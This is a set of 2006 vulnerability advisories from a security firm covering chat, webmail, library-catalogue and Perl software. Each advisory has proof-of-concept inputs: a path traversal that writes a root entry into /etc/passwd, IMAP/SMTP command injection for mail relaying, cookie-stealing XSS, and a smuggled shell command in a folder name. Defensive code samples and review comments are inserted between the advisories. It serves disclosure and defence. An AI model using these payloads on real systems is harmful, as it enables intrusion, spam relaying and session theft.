Advisories 2006

2006-001: Arbitrary remote file creation in 123flashchat server.
2006-002: IMAP/SMTP Command Injection in SquirrelMail.
2006-003: Arbitrary flash code remote execution in 123flashchat.
2006-004: Vtls.web.gateway cgi is vulnerable to a Cross Site Scripting attack.
2006-005: 'strings' command is vulnerable to a Denial of Service.
2006-006: SmbClientParser perl module allows remote command execution.
2006-007: The BlueSocket web administration is vulnerable to a Cross Site Scripting attack.
2006-010: XSS vulnerability in error page of ISMail.
2006-011: IMAP/SMTP Injection in Hastymail.
2006-013: Microsoft IIS5 NTLM and Basic authentication bypass

2006-001: Arbitrary remote file creation in 123flashchat server.

Original release date: January 09, 2006
Last revised: January 13, 2006
Discovered by: Jesus Olmos Gonzalez
Severity: 4/5

BACKGROUND

123 Flash Chat is a full-featured Java chat server and Flash chat client. The product homepage is www.123flashchat.com and it can be tested at:

http://host10.123flaschat.com/123flaschat.swf

http://www.123flashchat.com/123flashchat.swf

DESCRIPTION

The chat server has a user-registration feature that can be enabled with the following setting:

<enable-user-register>On</enable-user-register>

in /server/etc/groups/default.xml

By default it is enabled, so anybody can create a chat account.

The registration form asks for the following fields:
username, password, repeat-password and email.

When a user creates an account, a file is created in the members directory:

/123flashchat/server/data/default/members/isec-user

The user file has the following structure:

^@^B^@^<username>^@^V<password>^@^E<email>
or
^@^B^@^<username>^@^V<password>^@^@

field          size   allow null   parse                      example
username        32    no           allows traversal (../)     ../room_1.txt
password        32    no           allows anything            123
repeat-pass     32    no           allows anything            123
email          128    yes          /^.+@.+\..+$/aa            a@b.c

The username field allows anybody to create a file on the server's system, with the same privileges as the server process and almost arbitrary content.

This is dangerous because a user can take over other accounts, erase logs, modify the server's /etc/passwd or modify other config files.

PROOF OF CONCEPT

In the exploitation, there are two factors, WHERE and WHAT.
The username vector is WHERE, and WHAT can be:
1) password
2) email address if we need more bytes

Possible attacks:

../../../../logs/access.log            erase logs
../../../../logs/error.log             erase logs
../default/logs/access.log             erase logs
../members/parker                      change parker's password; if we then log in as parker, he will be disconnected
../../../../../../../etc/passwd        if the server runs as root
../../../../etc/ssh/sshd.conf          if the server runs as root
../../../../../var/log/messages        if the server runs as root
../../../../var/www/htdocs/x.php       try to build a shell
../../../etc/groups/default.xml        create an admin account or change other config settings
../../../fcserver.sh                   try to replace the script
etc.

It is possible to overwrite existing files in order to cause a DoS, erase logs, create or change system accounts, obtain other chat user/admin accounts or cause other effects on the server's system.

*Possible* remote execution if some config file is modified.

It is possible to intercept and modify the raw registration command to inject line feeds (0x0a) or other characters, and so construct arbitrary content for the created/overwritten file.
Example:

<?xml version="1.0" encoding="UTF-8"?>
<Register email="" passwd="(0x0a)root::0:0:root:/bin/bash(0x0a)"
user="../../../../../../../etc/passwd" />(0x0a)

/etc/passwd will be:

\0\2\0\3../../../../../../../etc/passwd\0\3
root::0:0:root:/bin/bash
\0\0

If the server runs on Windows, it is possible to get code execution.
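The two checks the registration handler is missing, field validation and path containment, as an added example (not code from 123 Flash Chat). The allow-list of username characters and the three-field validation are assumptions of this example; the advisory only gives the sizes and the fact that "../" is accepted.

```python
import os
import re

# Assumed allow-list for usernames: letters, digits, '-' and '_', 1..32 bytes.
USERNAME_RE = re.compile(r"[A-Za-z0-9_-]{1,32}")
# Loose e-mail shape; the field is optional (the advisory's table allows null).
EMAIL_RE = re.compile(r"[^@\s]+@[^@\s]+\.[^@\s]+")


class RegistrationError(ValueError):
    pass


def contain_path(members_dir: str, name: str) -> str:
    """Resolve members_dir/name and refuse anything whose parent is not members_dir.

    "../room_1.txt" or "../../../../../../../etc/passwd" resolve to a path
    outside the members directory and are rejected even if the allow-list
    were ever relaxed.
    """
    base = os.path.realpath(members_dir)
    candidate = os.path.realpath(os.path.join(base, name))
    if os.path.dirname(candidate) != base:
        raise RegistrationError(f"{name!r} escapes {members_dir}")
    return candidate


def validate_registration(username: str, password: str, email: str) -> dict:
    """Validate the register-form fields (repeat-password is compared earlier).

    Every field is also checked for CR, LF and NUL so that a stored record can
    never become the multi-line content the advisory shows ending up in
    /etc/passwd.
    """
    fields = {"username": username, "password": password, "email": email}
    for name, value in fields.items():
        if any(ch in value for ch in "\r\n\x00"):
            raise RegistrationError(f"control byte in {name}")
    if not USERNAME_RE.fullmatch(username):
        raise RegistrationError("username must be 1-32 chars of [A-Za-z0-9_-]")
    if not 1 <= len(password) <= 32:
        raise RegistrationError("password must be 1-32 chars")
    if email and (len(email) > 128 or not EMAIL_RE.fullmatch(email)):
        raise RegistrationError("malformed email")
    return fields


def member_file(members_dir: str, username: str, password: str, email: str) -> str:
    """Full check: validate the fields, then confine the path."""
    validate_registration(username, password, email)
    return contain_path(members_dir, username)


def is_rejected(members_dir: str, username: str, password: str = "123", email: str = "") -> bool:
    """True if the registration would be refused."""
    try:
        member_file(members_dir, username, password, email)
    except RegistrationError:
        return True
    return False


if __name__ == "__main__":
    members = "/123flashchat/server/data/default/members"  # directory named in the advisory
    print(member_file(members, "isec-user", "123", "a@b.c"))
    for bad in ("../room_1.txt", "../members/parker", "../../../../../../../etc/passwd"):
        print(bad, "rejected:", is_rejected(members, bad))
```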

BUSINESS IMPACT

The chat service can be crashed or compromised remotely.

SYSTEMS AFFECTED

This vulnerability affects the 123flashchat server up to 5.1 (released on Dec 22, 2005).

Tested on:
123flashchat server 5.1
123flashchat server 5.0

SOLUTION

Upgrade to a newer version.

REFERENCES

-

CREDITS

This vulnerability has been discovered and reported by
Jesús Olmos González (jolmos (at) isecauditors (dot) com).

REVISION HISTORY

January 09, 2006: Initial release.
January 13, 2006: Vendor response updated.

DISCLOSURE TIMELINE

January 04, 2006 Vulnerability discovered by Internet Security Auditors (www.isecauditors.com)
January 09, 2006 Initial vendor notification sent.
January 10, 2006 Quick response, Version 5.1_2 was released.

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.

2006-002: IMAP/SMTP Command Injection in SquirrelMail

Original release date: January 12, 2006
Last revised: February 27, 2006
Discovered by: Vicente Aguilera Díaz
Severity: 4/5

BACKGROUND

SquirrelMail is a standards-based webmail package written in PHP4. It includes built-in pure PHP support for the IMAP and SMTP protocols, and all pages render in pure HTML 4.0 (with no JavaScript required) for maximum compatibility across browsers. It has very few requirements and is very easy to configure and install. SquirrelMail has all the functionality you would want from an email client, including strong MIME support, address books, and folder manipulation.
The product homepage is http://www.squirrelmail.org.

DESCRIPTION

SquirrelMail provides a graphical interface to interact with mail servers across the IMAP and SMTP protocols.
Improper validation of the commands and data that SquirrelMail sends to the mail servers during normal use of the application (mailbox management, reading and sending e-mail, etc.) allows an authenticated malicious user to inject arbitrary IMAP/SMTP commands into the mail servers used by SquirrelMail, through the parameters the webmail front-end uses in its communication with those servers.
This is dangerous because the injection of these commands allows an intruder to evade restrictions imposed at the application level and to exploit vulnerabilities that may exist in the mail servers through IMAP/SMTP commands.

PROOF OF CONCEPT

IMAP example
SquirrelMail Vulnerable parameter: "passed_id" (and possibly others)

When a user clicks on the subject of an e-mail, the browser sends a GET request such as:
http://<victim>/src/read_body.php?mailbox=INBOX&passed_id=1&startMessage=1&show_more=0

A malicious user can modify the value of the "passed_id" parameter and inject any IMAP command.

Example:
Injection of the CAPABILITY IMAP command through the "passed_id" parameter:

http://<victim>/src/read_body.php?mailbox=INBOX&passed_id=1%20BODY[1]%0D%0AZ900%20CAPABILITY%0D%0AZ901%20CAPABILITY%0D%0AZ902%20FETCH%201&startMessage=1&show_more=0

The page returned by the web server shows the result of the CAPABILITY command.

Example:

Z900 OK CAPABILITY completed
* CAPABILITY IMAP4rev1 CHILDREN NAMESPACE THREAD=ORDEREDSUBJECT THREAD=REFERENCES
SORT QUOTA ACL ACL2=UNION
Z901 OK CAPABILITY completed

SMTP example
SquirrelMail Vulnerable parameter: "subject" (and possibly others)

When a user sends a message, the browser sends a POST request like:

POST http://<victim>/src/compose.php HTTP/1.1 ...
-----------------------------84060780712450133071594948441
Content-Disposition: form-data; name="subject"
Proof of Concept
-----------------------------84060780712450133071594948441
...

A malicious user can modify the value of the "subject" parameter and inject any SMTP command.

Example:
Relay from a non-existent e-mail address

...
-----------------------------84060780712450133071594948441
Content-Disposition: form-data; name="subject"
Proof of Concept
. mail from: hacker@domain.com
rcpt to: victim@otherdomain.com
data
This is a proof of concept of the SMTP command injection in SquirrelMail
. -----------------------------84060780712450133071594948441
...

BUSINESS IMPACT

IMAP/SMTP command injection allows spam, mail relaying, exploitation of IMAP and SMTP vulnerabilities in the mail servers, and evasion of all restrictions at the application layer.

SYSTEMS AFFECTED

IMAP Injection: All versions prior to 1.4.6.
SMTP Injection: SquirrelMail 1.2.7 (and older versions).

SOLUTION

Remove \r and \n from $mailbox in the function sqimap_mailbox_select.
Patch available: http://www.squirrelmail.org/security/issue/2006-02-15

REFERENCES

- http://www.squirrelmail.org/security/issue/2006-02-15
- CVE-2006-0377

CREDITS

This vulnerability has been discovered and reported by Vicente Aguilera Diaz (vaguilera=at=isecauditors=dot=com).

REVISION HISTORY

January 12, 2006: Initial release
January 20, 2006: Disclosure timeline updated
February 16, 2006: Disclosure timeline updated
February 27, 2006: Disclosure timeline updated

DISCLOSURE TIMELINE

December, 2005 Vulnerability discovered by Vicente Aguilera Diaz (Internet Security Auditors)
January 12, 2006 Initial vendor notification sent.
January 19, 2006 The vulnerability is fixed in 1.4.6 cvs and 1.5.1 cvs.
February 15, 2006 The vendor published the vulnerability in the security section.
February 25, 2006 The CVE-2006-0377 is updated.

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.

2006-003: Arbitrary flash code remote execution in 123flashchat.

Original release Date: January 12, 2006
Last revised: January 23, 2006
Discovered by: Jesus Olmos Gonzalez
Severity: 4/5

BACKGROUND

123 Flash Chat is a full-featured Java chat server and Flash chat client. The product homepage is www.123flashchat.com and it can be tested at:

http://host10.123flaschat.com/123flaschat.swf
http://www.123flashchat.com/123flashchat.swf

DESCRIPTION

The Flash chat client relies heavily on eval; in most cases this is vulnerable because variables that users can change are included in the string passed to eval.

If user input reaches an eval, code can be injected: if our user name contains the character ; we can write code inside the client.

If code can be written, a cracker can turn his user into an admin by changing his variables. It is possible to inject into other clients too.

Let's look at the vulnerable code:

function openOneAVWindow(username) {
    var i = 0;
    if (i < roomUsers.length) {
        var user = roomUsers[i];
        if (user.name == username)
        {

            if (eval("_root.avmc_" + user.name) == "")

If our username is:

x;user.name= a;user.name=ADMIN_AVATAR_NAME;//

the eval will become:

eval("_root.avmc_a;user.name=ADMIN_AVATAR_NAME;//");

and this will be executed when a window is opened:

user.name=ADMIN_AVATAR_NAME;

A username cannot contain the " character, so the ADMIN_AVATAR_NAME constant, whose value is "admin", is used instead.

PROOF OF CONCEPT

We have not exploited it successfully, but the vulnerability is there.

BUSINESS IMPACT

-

SYSTEMS AFFECTED

This vulnerability affects the 123flashchat server up to 5.1 (released on Dec 22, 2005).

SOLUTION

No patch available yet.

REFERENCES

-

CREDITS

This vulnerability has been discovered and reported by
Jesus Olmos Gonzalez (jolmos (at) isecauditors (dot) com).

REVISION HISTORY

January 13, 2006: Initial release.
January 23, 2006: Vendor response updated.

DISCLOSURE TIMELINE

January 04, 2006 Vulnerability discovered by Internet Security Auditors.
January 13, 2006 Initial vendor notification sent.
January 23, 2006 Vendor confirm that this is corrected in v5.1_2 i

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.

2006-004: Vtls.web.gateway cgi is vulnerable to a Cross Site Scripting attack.

Original release Date: April 18th, 2006
Last revised: November 13, 2007
Discovered by: Jesús Olmos González
Severity: 1/5

BACKGROUND

The vtls.web.gateway CGI is a product of Visionary Technology in Library Solutions.

http://www.vtls.com

DESCRIPTION

The vtls.web.gateway CGI is vulnerable to a Cross Site Scripting attack. A malicious link could be used to steal user sessions.

PROOF OF CONCEPT

It is possible to execute HTML and JavaScript in the browser of whoever clicks on a link like this:

http://somevtlsweb.net/cgi-bin/vtls/vtls.web.gateway?authority=1&searcht...
%22%3E%3Ch1%3E%3Cmarquee%3EXSS%20bug%3C/marquee%3E%3C/h1%3E%3C!--&
kind=ns&conf=080104+++++++

BUSINESS IMPACT

-

SYSTEMS AFFECTED

All installations of this product up to version 48.1.0.

SOLUTION

Update to version 48.1.1.

REFERENCES

www.vtls.com

CREDITS

This vulnerability has been discovered and reported by
Jesus Olmos Gonzalez (jolmos (at) isecauditors (dot) com).

REVISION HISTORY

April 18, 2006: Initial release.
November 13, 2007: Last revision.

DISCLOSURE TIMELINE

February 27, 2006: Vulnerability discovered by Internet Security Auditors.
April 18, 2006: Initial vendor notification sent. No response
April 26, 2006: Second vendor notification sent. Ping pong responses.
September 14, 2006: Third vendor notification sent. No response.
December 01, 2006: Fourth vendor notification sent. No response.
December 04, 2006: New patch coming. No schedule.
January 02, 2007: Fifth vendor contact to ask for planning. No response.
January 22, 2007: Sixth vendor contact to ask for planning. Scheduled.
March 23, 2007: Seventh vendor contact to ask for planning. Re-Scheduled.
May 22, 2007: Eighth vendor contact to ask for planning. Re-scheduled.
October 01, 2007: Ninth vendor contact to ask for planning. Patch will be published in October.
November 09, 2007: Tenth. Version 48.1.1 has been approved for general release and published.
November 13, 2007: Advisory Published.

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.

2006-005: strings, dbg and other binutils commands are vulnerable to a Denial of Service.

Original release Date: April 16th, 2006
Last revised: April 26th, 2006
Discovered by: Jesús Olmos González
Severity: 2/5

BACKGROUND

strings and dbg are tools from the binutils package; they can be used to look for printable strings in a binary file and to debug and reverse engineer executables.

http://www.gnu.org/software/binutils/

DESCRIPTION

A binary file can be protected against the use of strings.

It is possible to build a binary with some special characters in a variable such that, once compiled, the printable strings of the ELF cannot be extracted with the strings tool: it segfaults or hangs.

(gdb) r evil
Starting program: /usr/bin/strings evil
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)

Program received signal SIGSEGV, Segmentation fault.
0xb7e9ecbd in bfd_hash_lookup () from /usr/lib/libbfd-2.16.1.so
(gdb)

The problem is in bfd_hash_lookup from the libbfd-2.16.1.so library, at this snippet of code:

1fcb1: c1 ef 02 shr $0x2,%edi
1fcb4: 31 c7 xor %eax,%edi
1fcb6: 89 f8 mov %edi,%eax
1fcb8: 8b 4d 08 mov 0x8(%ebp),%ecx
1fcbb: 31 d2 xor %edx,%edx
1fcbd: f7 71 04 divl 0x4(%ecx)
<--SIGSEGV with %253Cc%AAAAA%AAAAA%AAAAA%AAAAA%AAAAA%AAAAA
1fcc0: 01 d2 add %edx,%edx
1fcc2: 01 d2 add %edx,%edx
1fcc4: 89 55 e0 mov %edx,0xffffffe0(%ebp)

With %253Cc, ecx gets the value 0x54, and that address cannot be accessed.
It does not seem to be exploitable, but it is under investigation.

All versions are affected.

PROOF OF CONCEPT

This evil file cannot be scanned with the strings command:

root@jolmos:/research# strings evil
Violacion de segmento

root@jolmos:/research# cat evil

%253Cc%253Cc%253Cc%253Cc%253Cc%253Cc%253Cc

root@jolmos:/research

BUSINESS IMPACT

-

SYSTEMS AFFECTED

Tested on some Linux systems.

SOLUTION

There is a provisional patch at:
http://sourceware.org/bugzilla/attachment.cgi?id=978&action=view

REFERENCES

-

CREDITS

This vulnerability has been discovered and reported by
Jesus Olmos Gonzalez (jolmos (at) isecauditors (dot) com).

REVISION HISTORY

April 18, 2006: Initial release.
April 26, 2006: The patch has been added at disclosure timeline.

DISCLOSURE TIMELINE

February 29, 2006 Vulnerability discovered by Internet Security Auditors (www.isecauditors.com)
April 18, 2006 Initial vendor notification sent (http://sourceware.org/bugzilla/show_bug.cgi?id=2584)
April 23, 2006 A provisional patch was published (http://sourceware.org/bugzilla/attachment.cgi?id=978&action=view)

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.

2006-006: SmbClientParser perl module allows remote command execution

Original release date: February 28, 2006
Last revised: July 18th, 2008
Discovered by: Jesus Olmos Gonzalez
Severity: 5/5

BACKGROUND

SmbClientParser is a useful Perl module for writing interactive NetBIOS code; it is a wrapper around the Linux smbclient command and can be downloaded from:

http://search.cpan.org/~alian/Filesys-SmbClientParser-2.7/SmbClientParser.pm

or installed with:
perl -MCPAN -e shell
install Filesys::SmbClientParser

DESCRIPTION

If a host scans your shared folder with a tool that uses this module, you can execute shell commands on that host.

This module has the following snippet of code:

my @var = `$pargs`;

$pargs is derived from $args using the following weak filters:

my $pargs;
if ($args=~/^([^;]*)$/) { # no ';' nickel
    $pargs=$1;
} elsif ($smbscript) { # ';' is allowed inside -c ' '
    if ($args=~/^([^;]* -c '[^']*'[^;]*)$/) {
        $pargs=$1;
    } else { # what that ?
        die("Why a ';' here ? => $args");
    }
} else { die("Why a ';' here ? => $args"); }

If there is a folder inside the shared folder with the following name:

' x && xterm &#

The Perl code will spawn an xterm :)
Note that this was reported in 2006 and no answer was received; be careful with CPAN modules.

PROOF OF CONCEPT

This folder name inside the shared folder:

' x && xterm &#

Will execute the following:
/usr/bin/smbclient "//x.x.x.x/vulns" -U "user%pass" -d0 -c 'cd "' x && xterm &#"' -D "/poc"

This proof of concept spawns an xterm on the victim's X display; an attacker would replace xterm with other commands.

BUSINESS IMPACT

-

SYSTEMS AFFECTED

All versions up to and including 2.7.

SOLUTION

Use this patch:

138a139,146
> #------------------------------------------------------------------------------
> # Sanitize (jolmos[@]isecauditors[.]com)
> #------------------------------------------------------------------------------
> sub Sanitize {
> my $danger = $_[0]; #There are many danger bytes, but if the
> $$danger =~ s/\n|\r|'|"|//ig; #danger string is inside "" or '' the only
> #option is break with ' or " or \r or \n
> }
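Review bot: the substitution in Sanitize, `$$danger =~ s/\n|\r|'|"|//ig;`, ends with an empty alternative (the `|` before the closing `/`), so the pattern also matches the empty string at every position; the replacement is empty so this is harmless, but it reads as a typo and the `i` flag does nothing on a pattern with no letters. A character class, `s/[\r\n'"]//g;`, states the intent (strip CR, LF and both quote characters) unambiguously, and the three-line comment interleaved with the code would be easier to read as one block above `sub Sanitize`.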
265a274
> foreach my $i (@_) { &Sanitize(\$i); }
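Review bot: `foreach my $i (@_) { &Sanitize(\$i); }` depends on `$i` aliasing the elements of `@_`, which themselves alias the caller's variables, so the caller's values are rewritten in place; that is the intended effect here, but if any caller passes a string literal, the in-place `s///` dies with "Modification of a read-only value attempted". Copying the arguments into lexicals first (`my @args = @_;`) and sanitizing and using `@args` in the sub body avoids that failure mode; the same applies to each of the identical hunks below.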
287a297
> foreach my $i (@_) { &Sanitize(\$i); }
321a332
> foreach my $i (@_) { &Sanitize(\$i); }
331a343
> foreach my $i (@_) { &Sanitize(\$i); }
345a358
> foreach my $i (@_) { &Sanitize(\$i); }
359a373
> foreach my $i (@_) { &Sanitize(\$i); }
373a388
> foreach my $i (@_) { &Sanitize(\$i); }
375a391
>
387a404
> foreach my $i (@_) { &Sanitize(\$i); }
398a416
> foreach my $i (@_) { &Sanitize(\$i); }
409a428
> foreach my $i (@_) { &Sanitize(\$i); }
487a507
> foreach my $i (@_) { &Sanitize(\$i); }

REFERENCES

http://search.cpan.org/~alian/Filesys-SmbClientParser-2.7

CREDITS

This vulnerability has been discovered and reported by Jesus Olmos Gonzalez (jolmos (at) isecauditors (dot) com).

REVISION HISTORY

April 26, 2006: Initial release.
July 14, 2008: Patch added.

DISCLOSURE TIMELINE

February 26, 2006: The vulnerability discovered by Internet Security Auditors.
April 26, 2006: Initial vendor notification sent.
September 14, 2006: Second notification: correction in one week. No correction.
December 2, 2006: Third notification: no response.
January 18, 2007: Fourth notification: no response.
May 1, 2007: Fifth notification: no response.
November 11, 2007: Sixth notification: no response.
July 14, 2008: No response from the developer (Alain Barbet); we wrote the patch.

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.

2006-007: The BlueSocket web administration is vulnerable to a Cross Site Scripting attack

Original release Date: April 27th, 2006
Last revised: December 1st, 2006
Discovered by: Jesús Olmos González
Severity: 2/5

BACKGROUND

The BSC 2100 product is part of the BlueSecure family (www.bluesocket.com).

BlueSecure Controllers provide high-performance, reliable, policy-based WLAN security and management solutions that have been deployed by hundreds of large institutions, enterprises, and public access providers.

DESCRIPTION

The admin.pl Perl code does not sanitize its inputs, so when it writes the username back into the input field, HTML and script code can be written into the page and executed by the browser.

This cross-site scripting issue is in the administration interface of the security product; it has been tested only on the BSC 2100.

It is possible to send the admin a fake e-mail spoofing the product's address, saying that the configuration is not OK and including the special link.

If the admin follows the link and logs in through the apparently normal interface, his credentials will be sent to the attacker.

Combined with good social engineering, this is a significant risk.

PROOF OF CONCEPT

This PoC injects some HTML to modify the look and feel of the authentication page; an attacker could inject script code to send back the credentials:

https://host.domain.com/admin.pl?ad_name=%22%3E%3Ch1%3EXSS%20BUG%3C/h1%3...

BUSINESS IMPACT

Credentials could be stolen through social engineering attacks.

SYSTEMS AFFECTED

Versions prior to 5.2, or 5.1.1 without the 5.1.1-BluePatch.

SOLUTION

Update to version 5.2 or apply the 5.1.1-BluePatch.

REFERENCES

Vulnerability item number 4484 in the Bluepatch V6 for 5.1.1.1 Release Notes.

CREDITS

This vulnerability has been discovered and reported by
Jesus Olmos Gonzalez (jolmos (at) isecauditors (dot) com).

REVISION HISTORY

April 27, 2006: Initial vendor contact.
April 28, 2006: Vendor updates its near patch.
June 21, 2006: Publication of the patch.
September 16, 2006: Vendor confirms inclusion in referenced patch.
September 17, 2006: Advisory revised.

DISCLOSURE TIMELINE

April 26, 2006: Vulnerability discovered by Internet Security Auditors (www.isecauditors.com).
December 1, 2006: Advisory finally published.

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.

2006-010: XSS vulnerability in error page of ISMail

Original release date: September 28, 2006
Last revised: December 1, 2006
Discovered by: Vicente Aguilera Díaz
Severity: 3/5

BACKGROUND

ISMail is a webmail system. Programmed in HTML and PHP, it is designed to work with any imap server.

ISMail requires PHP 4.2+, compiled with IMAP and session support, to be installed on the server that runs it.

You have a choice of data-store backends (xml, encrypted xml, mysql, and postgresql are included, each requiring their respective PHP modules), and miscellaneous other options that can make the Inside Systems Mail experience a little friendlier.

Unlike most other webmail programs, Inside Systems Mail is both quick and easy to use. The layout, complete with address book and folder options, is simple and familiar to most users.

For administrators, the data-stores and options are easily extensible so that Inside Systems Mail can be dropped in nearly any configuration with minimal extra coding.

DESCRIPTION

The error page "error.php" receives a parameter in the query string that holds the error message to display.

This parameter ("error") can be manipulated by an attacker to inject arbitrary script/HTML code.

This is dangerous because it makes XSS attacks possible: obtaining the session cookies of authenticated users in order to hijack their sessions, or defacing the error page.

PROOF OF CONCEPT

Example of XSS attack:

http://<webserver>/<path_to_ismail>/error.php \
?error=XSS%20attack%3Cscript%3Ealert(document.cookie);%3C/script%3E
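The reflected-parameter defect shared by this advisory, 2006-007 (admin.pl writing ad_name back into the login form) and 2006-004, shown as an added example in Python rather than the products' PHP/Perl: the unencoded rendering beside the output-encoded one, with a small HTML-parser check that counts the elements a browser would create. The page templates and the decoded payload constants are constructed here from the advisories' PoC URLs; none of this is the vendors' code.

```python
import html
from html.parser import HTMLParser

# Decoded payloads, constructed from the three advisories' PoC URLs.
ERROR_PAYLOAD = "XSS attack<script>alert(document.cookie);</script>"  # 2006-010, error.php
ADNAME_PAYLOAD = '"><h1>XSS BUG</h1>'                                  # 2006-007, admin.pl
VTLS_PAYLOAD = '"><h1><marquee>XSS bug</marquee></h1><!--'             # 2006-004, vtls.web.gateway


def render_error_vulnerable(error: str) -> str:
    """What a reflecting error page does: the parameter is pasted into the body."""
    return f'<p class="error">{error}</p>'


def render_error_fixed(error: str) -> str:
    """Text context: html.escape turns &, <, > (and quotes) into entities."""
    return f'<p class="error">{html.escape(error)}</p>'


def render_username_vulnerable(ad_name: str) -> str:
    """admin.pl-style: the submitted username is written back into the value
    attribute of the login form without encoding, so a leading " closes it."""
    return f'<input type="text" name="ad_name" value="{ad_name}">'


def render_username_fixed(ad_name: str) -> str:
    """Attribute context: quote=True (the default) turns " into &quot;, so the
    attribute cannot be closed early; < and > are escaped as in text."""
    return f'<input type="text" name="ad_name" value="{html.escape(ad_name, quote=True)}">'


class _TagCollector(HTMLParser):
    def __init__(self) -> None:
        super().__init__()
        self.tags: list = []

    def handle_starttag(self, tag, attrs) -> None:
        self.tags.append(tag)


def tags_in(fragment: str) -> list:
    """Element names a browser would create from the fragment; anything beyond
    the template's own elements came from the parameter."""
    collector = _TagCollector()
    collector.feed(fragment)
    collector.close()
    return collector.tags


def escapes_payload(render, payload: str, template_tags: list) -> bool:
    """True if rendering the payload yields only the template's own elements."""
    return tags_in(render(payload)) == template_tags


if __name__ == "__main__":
    print(tags_in(render_error_vulnerable(ERROR_PAYLOAD)))      # ['p', 'script']
    print(tags_in(render_error_fixed(ERROR_PAYLOAD)))           # ['p']
    print(tags_in(render_username_vulnerable(ADNAME_PAYLOAD)))  # ['input', 'h1']
    print(tags_in(render_username_fixed(VTLS_PAYLOAD)))         # ['input']
```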

BUSINESS IMPACT

An attacker can hijack the sessions of other authenticated users, gaining access to their mail, or deface the error page.

SYSTEMS AFFECTED

This vulnerability has been tested on the latest version of ISMail (2.0, released on 2005-01-20).
Possibly all versions are affected by this vulnerability.

SOLUTION

Update to the version in the repository.

REFERENCES

http://www.insidesystems.net/projects/project.php?projectid=4

CREDITS

This vulnerability has been discovered and reported by
Vicente Aguilera Díaz (vaguilera (at) isecauditors (dot) com).

REVISION HISTORY

September 28, 2006: Initial release.

DISCLOSURE TIMELINE

September 27, 2006 Vulnerability discovered by Internet Security Auditors (www.isecauditors.com).
September 28, 2006 Initial vendor notification sent.
October 1, 2006 The vendor fixed the vulnerability in the repository.

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.

2006-011: IMAP/SMTP Injection in Hastymail

Original release date: September 28, 2006
Last revised: December 1, 2006
Discovered by: Vicente Aguilera Díaz
Severity: 3/5

BACKGROUND

Hastymail is yet another webmail IMAP client written in PHP. Hastymail is designed for speed, RFC compatibility, simplicity, and security. Our goal is to create a simple interface with powerful but easy to use options that make managing your IMAP account effective and fast.

Hastymail is NOT groupware. We are focused on being a functional and fast webmail client.

The product homepage is http://hastymail.sourceforge.net/

DESCRIPTION

Hastymail provides a graphical interface to interact with mail servers across the IMAP/SMTP protocols.

Improper validation of the commands and data that Hastymail sends to the mail servers during normal use of the application (for example, accessing the mailbox) allows an authenticated malicious user to inject arbitrary IMAP/SMTP commands into the mail servers used by Hastymail, through the parameters the webmail front-end uses in its communication with those servers.

This is dangerous because the injection of these commands allows an intruder to evade restrictions imposed at the application level and to exploit vulnerabilities that may exist in the mail servers through IMAP/SMTP commands.

PROOF OF CONCEPT

== IMAP Injection example (1.5 version) =============

Hastymail Vulnerable parameter: "mailbox" (and possibly others)

When a user accesses a folder (for example, "INBOX"), the browser sends a GET request such as:

http://<webserver>/<path_to_hastymail>/html/mailbox.php \
?id=47fc54216aae12d57570c9703abe1b7d&mailbox=INBOX

A malicious user can modify the value of the "mailbox" parameter and inject any IMAP command.

The IMAP command injection has the following structure:

http://<webserver>/<path_to_hastymail>/html/mailbox.php \
?id=47fc54216aae12d57570c9703abe1b7d&mailbox=INBOX%2522%0d%0a<ID>%20 \
<INJECT_IMAP_COMMAND_HERE>%0D%0A<ID>%20SELECT%20%2522INBOX

Note that double URL encoding is used to encode the quote character (").

Example:

Injection of the CREATE IMAP command through the "mailbox" parameter:

http://<webserver>/<path_to_hastymail>/html/mailbox.php \
?id=47fc54216aae12d57570c9703abe1b7d&mailbox=INBOX \
%2522%0d%0aA0003%20CREATE%2522INBOX.vad

== SMTP Injection example (1.5 version) =============

Hastymail Vulnerable parameter: "subject" (and possibly others)

When a user sends a message, the browser sends a POST request like:

POST http://<webserver>/<path_to_hastymail>/html/compose.php HTTP/1.1
...

-----------------------------84060780712450133071594948441
Content-Disposition: form-data; name="subject"
Proof of Concept

-----------------------------84060780712450133071594948441
...

A malicious user can modify the value of the "subject" parameter and inject any SMTP command.

Example: Relay from a non-existent e-mail address.

...
-----------------------------84060780712450133071594948441
Content-Disposition: form-data; name="subject"
Proof of Concept
.

mail from: hacker@domain.com
rcpt to: victim@otherdomain.com
data
This is a proof of concept of the SMTP command injection in Hastymail
.

-----------------------------84060780712450133071594948441
...

BUSINESS IMPACT

IMAP/SMTP command injection allows exploiting vulnerabilities in the IMAP/SMTP servers and evading all restrictions at the application layer.

SYSTEMS AFFECTED

This vulnerability has been tested on:

  • Latest development version: 1.5, released on February 17, 2006
  • Latest stable version: 1.0.2, August 23, 2004
  • Possibly all versions are affected by this vulnerability.

SOLUTION

Apply the patch: http://hastymail.sourceforge.net/security.php
